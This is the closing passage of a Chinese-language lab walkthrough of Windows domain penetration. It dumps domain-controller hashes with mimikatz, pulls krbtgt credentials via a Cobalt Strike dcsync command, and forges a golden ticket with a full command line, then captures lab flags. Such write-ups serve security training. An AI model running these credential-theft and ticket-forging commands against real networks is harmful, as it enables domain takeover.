<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:21.85pt;margin-left:1.55pt;margin-right:0cm;margin-top:0cm;">
        <img width="491" height="153" src="https://www.2k8.org/content/uploadfile/202203/17/429aab9a.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:45.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="1" src="https://www.2k8.org/content/uploadfile/202203/17/98a1e069.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:28.2pt;margin-left:-.25pt;">
        <a name="_Toc21093"></a><span lang="EN-US">5.2.11. </span><span><span style="font-family:宋体;font-weight:normal;">获取 </span><span lang="EN-US">dc </span></span><span><span style="font-family:宋体;font-weight:normal;">明文哈希</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">命令输入 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">mimikatz hashdump</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:38.6pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="555" height="123" src="https://www.2k8.org/content/uploadfile/202203/17/00091c1b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:106.75pt;margin-bottom:0cm;margin-left:-.25pt;line-height:247%;">
        <a name="_Toc21094"></a><span lang="EN-US">5.2.12. cobaltstrike </span><span><span style="font-family:宋体;font-weight:normal;">制作黄金票据</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:247%;margin-bottom:0cm;margin-left:-.25pt;margin-right:106.75pt;margin-top:0cm;text-indent:-.5pt;">
        <b><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:247%;">5.2.12.1. </span></b><span style="font-family:黑体;font-size:14.0pt;line-height:247%;">在域控上执行命令导出 </span><b><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:247%;">krbtgt </span></b><span style="font-family:黑体;font-size:14.0pt;line-height:247%;">信息</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">beacon&gt; dcsync hackbox.com hackbox\krbtgt</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:41.6pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="347" src="https://www.2k8.org/content/uploadfile/202203/17/e2f89960.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
        <span lang="EN-US">5.2.12.2. </span><span style="font-family:黑体;font-weight:normal;">在 </span><span lang="EN-US">web </span><span style="font-family:黑体;font-weight:normal;">上制作黄金票据</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:20.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="125" src="https://www.2k8.org/content/uploadfile/202203/17/cedc5228.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">mimikatz kerberos::golden /user:moon /domain:hackbox.com</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/sid:S-1-5-21-2005268815-658469957-1189185684</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:15.65pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/krbtgt:6f60ace6accbcb76078ccc0312174e98 /endin:480 /renewmax:10080 /ptt</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">制作前访问 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">失败</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:23.65pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="216" src="https://www.2k8.org/content/uploadfile/202203/17/e98d0cfd.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">制造后访问 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">成功</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:43.7pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="269" src="https://www.2k8.org/content/uploadfile/202203/17/639e090d.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:18.0pt;margin-left:-.25pt;">
        <a name="_Toc21095"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">6.FLAG </span></b>获取<span lang="EN-US"></span>
</h1>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:.5pt;margin-left:-.25pt;">
        <a name="_Toc21096"></a><span lang="EN-US">6.1.web flag1</span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="143" src="https://www.2k8.org/content/uploadfile/202203/17/d701436b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:0cm;margin-left:-.25pt;">
        <a name="_Toc21097"></a><span lang="EN-US">6.2.web flag2</span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:38.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="145" src="https://www.2k8.org/content/uploadfile/202203/17/652c3241.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:3.75pt;margin-left:-.25pt;">
        <a name="_Toc21098"></a><span lang="EN-US">6.3.dc flag3</span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:46.25pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="155" src="https://www.2k8.org/content/uploadfile/202203/17/e9d3c5ba.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h1 style="margin-top:0cm;margin-right:154.3pt;margin-bottom:.25pt;margin-left:-.25pt;line-height:292%;">
        <a name="_Toc21099"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">7.</span></b>关注<span lang="EN-US"></span>
</h1>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:292%;margin-bottom:.25pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 225.7pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:292%;">个人公众号<span lang="EN-US"><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span>暗月博客公众号</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:5.5pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
        <img width="400" height="1" src="https://www.2k8.org/content/uploadfile/202203/17/cd44b0f0.gif" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">下回给大家带来一个内网限制条件较多域 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">bypass av </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">过防火墙等复杂的域内环境</span><span lang="EN-US"></span>
</p>

查看完整版本: 完整的内网域渗透